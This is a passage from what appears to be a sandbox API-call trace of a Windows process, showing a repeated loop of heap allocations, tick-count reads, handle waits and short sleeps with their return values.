hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad1fd0 | out: hHeap=0x2150000) returned 1 [0190.454] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.454] GetTickCount () returned 0x218861f [0190.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2b40 [0190.454] GetTickCount () returned 0x218861f [0190.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2b40 | out: hHeap=0x2150000) returned 1 [0190.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0190.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.457] GetTickCount () returned 0x2188eb5 [0190.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0190.457] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.457] GetTickCount () returned 0x2188eb5 [0190.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.457] GetTickCount () returned 0x2188eb5 [0190.457] GetTickCount () returned 0x2188eb5 [0190.457] GetTickCount () returned 0x2188eb5 [0190.457] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.457] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.457] GetTickCount () returned 0x2188eb5 [0190.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad27e0 [0190.457] GetTickCount () returned 0x2188eb5 [0190.457] GetTickCount () returned 0x2188eb5 [0190.457] GetTickCount () returned 0x2188eb5 [0190.457] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad27e0 | out: hHeap=0x2150000) returned 1 [0190.457] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.457] GetTickCount () returned 0x2188eb5 [0190.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.457] GetTickCount () returned 0x2188eb5 [0190.457] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0190.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.461] GetTickCount () returned 0x218975b [0190.461] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0190.461] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.461] GetTickCount () returned 0x218975b [0190.461] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.461] GetTickCount () returned 0x218975b [0190.461] GetTickCount () returned 0x218975b [0190.461] GetTickCount () returned 0x218975b [0190.461] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.461] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.461] GetTickCount () returned 0x218975b [0190.461] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.461] GetTickCount () returned 0x218975b [0190.461] GetTickCount () returned 0x218975b [0190.461] GetTickCount () returned 0x218975b [0190.461] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.461] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.461] GetTickCount () returned 0x218975b [0190.461] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.461] GetTickCount () returned 0x218975b [0190.461] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.461] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0190.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.464] GetTickCount () returned 0x2189ff1 [0190.464] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0190.464] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.464] GetTickCount () returned 0x2189ff1 [0190.464] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.464] GetTickCount () returned 0x2189ff1 [0190.465] GetTickCount () returned 0x2189ff1 [0190.465] GetTickCount () returned 0x2189ff1 [0190.465] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.465] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.465] GetTickCount () returned 0x2189ff1 [0190.465] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.465] GetTickCount () returned 0x2189ff1 [0190.465] GetTickCount () returned 0x2189ff1 [0190.465] GetTickCount () returned 0x2189ff1 [0190.465] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.465] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.465] GetTickCount () returned 0x2189ff1 [0190.465] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a50 [0190.465] GetTickCount () returned 0x2189ff1 [0190.465] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a50 | out: hHeap=0x2150000) returned 1 [0190.465] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0190.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.468] GetTickCount () returned 0x218a887 [0190.468] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0190.468] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.468] GetTickCount () returned 0x218a887 [0190.468] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.468] GetTickCount () returned 0x218a887 [0190.468] GetTickCount () returned 0x218a887 [0190.468] GetTickCount () returned 0x218a887 [0190.468] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.468] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.468] GetTickCount () returned 0x218a887 [0190.468] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2780 [0190.468] GetTickCount () returned 0x218a887 [0190.468] GetTickCount () returned 0x218a887 [0190.468] GetTickCount () returned 0x218a887 [0190.468] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2780 | out: hHeap=0x2150000) returned 1 [0190.468] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.468] GetTickCount () returned 0x218a887 [0190.468] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.468] GetTickCount () returned 0x218a887 [0190.468] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.468] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0190.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.471] GetTickCount () returned 0x218b11d [0190.471] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0190.471] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.471] GetTickCount () returned 0x218b11d [0190.471] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.471] GetTickCount () returned 0x218b11d [0190.471] GetTickCount () returned 0x218b11d [0190.471] GetTickCount () returned 0x218b11d [0190.472] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.472] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.472] GetTickCount () returned 0x218b11d [0190.472] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.472] GetTickCount () returned 0x218b11d [0190.472] GetTickCount () returned 0x218b11d [0190.472] GetTickCount () returned 0x218b11d [0190.472] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.472] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.472] GetTickCount () returned 0x218b11d [0190.472] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.472] GetTickCount () returned 0x218b11d [0190.472] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.472] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0190.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.475] GetTickCount () returned 0x218b9b3 [0190.475] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65230 [0190.475] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.475] GetTickCount () returned 0x218b9b3 [0190.475] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.475] GetTickCount () returned 0x218b9b3 [0190.475] GetTickCount () returned 0x218b9b3 [0190.475] GetTickCount () returned 0x218b9b3 [0190.475] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.475] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.475] GetTickCount () returned 0x218b9b3 [0190.475] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.475] GetTickCount () returned 0x218b9b3 [0190.475] GetTickCount () returned 0x218b9b3 [0190.475] GetTickCount () returned 0x218b9b3 [0190.475] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.475] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.475] GetTickCount () returned 0x218b9b3 [0190.475] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.475] GetTickCount () returned 0x218b9b3 [0190.475] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.475] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65230 | out: hHeap=0x2150000) returned 1 [0190.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.481] GetTickCount () returned 0x218c258 [0190.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64eb0 [0190.481] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.481] GetTickCount () returned 0x218c258 [0190.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.481] GetTickCount () returned 0x218c258 [0190.481] GetTickCount () returned 0x218c258 [0190.482] GetTickCount () returned 0x218c258 [0190.482] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.482] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.482] GetTickCount () returned 0x218c258 [0190.482] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.482] GetTickCount () returned 0x218c258 [0190.482] GetTickCount () returned 0x218c258 [0190.482] GetTickCount () returned 0x218c258 [0190.482] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.482] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.482] GetTickCount () returned 0x218c258 [0190.482] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.482] GetTickCount () returned 0x218c258 [0190.482] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.482] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64eb0 | out: hHeap=0x2150000) returned 1 [0190.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.485] GetTickCount () returned 0x218caee [0190.485] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b30 [0190.485] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.485] GetTickCount () returned 0x218caee [0190.485] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.485] GetTickCount () returned 0x218caee [0190.485] GetTickCount () returned 0x218caee [0190.485] GetTickCount () returned 0x218caee [0190.485] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.485] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.485] GetTickCount () returned 0x218caee [0190.485] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.485] GetTickCount () returned 0x218caee [0190.485] GetTickCount () returned 0x218caee [0190.485] GetTickCount () returned 0x218caee [0190.485] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.485] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.485] GetTickCount () returned 0x218caee [0190.485] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.485] GetTickCount () returned 0x218caee [0190.485] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.486] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b30 | out: hHeap=0x2150000) returned 1 [0190.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.488] GetTickCount () returned 0x218d384 [0190.488] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0190.488] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.488] GetTickCount () returned 0x218d384 [0190.488] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.488] GetTickCount () returned 0x218d384 [0190.489] GetTickCount () returned 0x218d384 [0190.489] GetTickCount () returned 0x218d384 [0190.489] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.489] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.489] GetTickCount () returned 0x218d384 [0190.489] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.489] GetTickCount () returned 0x218d384 [0190.489] GetTickCount () returned 0x218d384 [0190.489] GetTickCount () returned 0x218d384 [0190.489] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.489] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.489] GetTickCount () returned 0x218d384 [0190.489] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.489] GetTickCount () returned 0x218d384 [0190.489] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.489] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0190.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.492] GetTickCount () returned 0x218dc2a [0190.492] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0190.492] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.492] GetTickCount () returned 0x218dc2a [0190.492] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.492] GetTickCount () returned 0x218dc2a [0190.492] GetTickCount () returned 0x218dc2a [0190.492] GetTickCount () returned 0x218dc2a [0190.492] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.492] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.492] GetTickCount () returned 0x218dc2a [0190.492] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.492] GetTickCount () returned 0x218dc2a [0190.492] GetTickCount () returned 0x218dc2a [0190.492] GetTickCount () returned 0x218dc2a [0190.492] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.492] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.493] GetTickCount () returned 0x218dc2a [0190.493] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad26c0 [0190.493] GetTickCount () returned 0x218dc2a [0190.493] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad26c0 | out: hHeap=0x2150000) returned 1 [0190.493] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0190.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.497] GetTickCount () returned 0x218e4c0 [0190.497] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0190.497] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.497] GetTickCount () returned 0x218e4c0 [0190.497] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.497] GetTickCount () returned 0x218e4c0 [0190.497] GetTickCount () returned 0x218e4c0 [0190.497] GetTickCount () returned 0x218e4c0 [0190.497] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.497] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.497] GetTickCount () returned 0x218e4c0 [0190.497] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.497] GetTickCount () returned 0x218e4c0 [0190.497] GetTickCount () returned 0x218e4c0 [0190.497] GetTickCount () returned 0x218e4c0 [0190.497] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.497] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.497] GetTickCount () returned 0x218e4c0 [0190.497] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2750 [0190.497] GetTickCount () returned 0x218e4c0 [0190.497] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2750 | out: hHeap=0x2150000) returned 1 [0190.498] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0190.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.500] GetTickCount () returned 0x218ed56 [0190.500] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65230 [0190.500] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.500] GetTickCount () returned 0x218ed56 [0190.500] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.500] GetTickCount () returned 0x218ed56 [0190.500] GetTickCount () returned 0x218ed56 [0190.501] GetTickCount () returned 0x218ed56 [0190.501] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.501] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.501] GetTickCount () returned 0x218ed56 [0190.501] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2780 [0190.501] GetTickCount () returned 0x218ed56 [0190.501] GetTickCount () returned 0x218ed56 [0190.501] GetTickCount () returned 0x218ed56 [0190.501] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2780 | out: hHeap=0x2150000) returned 1 [0190.501] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.501] GetTickCount () returned 0x218ed56 [0190.501] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.501] GetTickCount () returned 0x218ed56 [0190.501] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.501] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65230 | out: hHeap=0x2150000) returned 1 [0190.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.504] GetTickCount () returned 0x218f5ec [0190.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0190.504] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.504] GetTickCount () returned 0x218f5ec [0190.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.504] GetTickCount () returned 0x218f5ec [0190.504] GetTickCount () returned 0x218f5ec [0190.504] GetTickCount () returned 0x218f5ec [0190.504] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.504] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.504] GetTickCount () returned 0x218f5ec [0190.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.504] GetTickCount () returned 0x218f5ec [0190.504] GetTickCount () returned 0x218f5ec [0190.504] GetTickCount () returned 0x218f5ec [0190.504] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.504] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.504] GetTickCount () returned 0x218f5ec [0190.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.505] GetTickCount () returned 0x218f5ec [0190.505] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.505] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0190.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.522] GetTickCount () returned 0x218fe92 [0190.522] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b30 [0190.522] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.522] GetTickCount () returned 0x218fe92 [0190.522] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.522] GetTickCount () returned 0x218fe92 [0190.522] GetTickCount () returned 0x218fe92 [0190.522] GetTickCount () returned 0x218fe92 [0190.522] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.522] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.522] GetTickCount () returned 0x218fe92 [0190.522] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.522] GetTickCount () returned 0x218fe92 [0190.522] GetTickCount () returned 0x218fe92 [0190.522] GetTickCount () returned 0x218fe92 [0190.522] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.522] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.523] GetTickCount () returned 0x218fe92 [0190.523] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2ab0 [0190.523] GetTickCount () returned 0x218fe92 [0190.523] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2ab0 | out: hHeap=0x2150000) returned 1 [0190.523] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b30 | out: hHeap=0x2150000) returned 1 [0190.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.526] GetTickCount () returned 0x2190737 [0190.526] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65230 [0190.526] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.526] GetTickCount () returned 0x2190737 [0190.526] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.526] GetTickCount () returned 0x2190737 [0190.526] GetTickCount () returned 0x2190737 [0190.526] GetTickCount () returned 0x2190737 [0190.526] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.526] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.526] GetTickCount () returned 0x2190737 [0190.526] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2ab0 [0190.526] GetTickCount () returned 0x2190737 [0190.527] GetTickCount () returned 0x2190737 [0190.527] GetTickCount () returned 0x2190737 [0190.527] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2ab0 | out: hHeap=0x2150000) returned 1 [0190.527] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.527] GetTickCount () returned 0x2190737 [0190.527] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.527] GetTickCount () returned 0x2190737 [0190.527] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.527] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65230 | out: hHeap=0x2150000) returned 1 [0190.527] NtDelayExecution (Alertable=0, 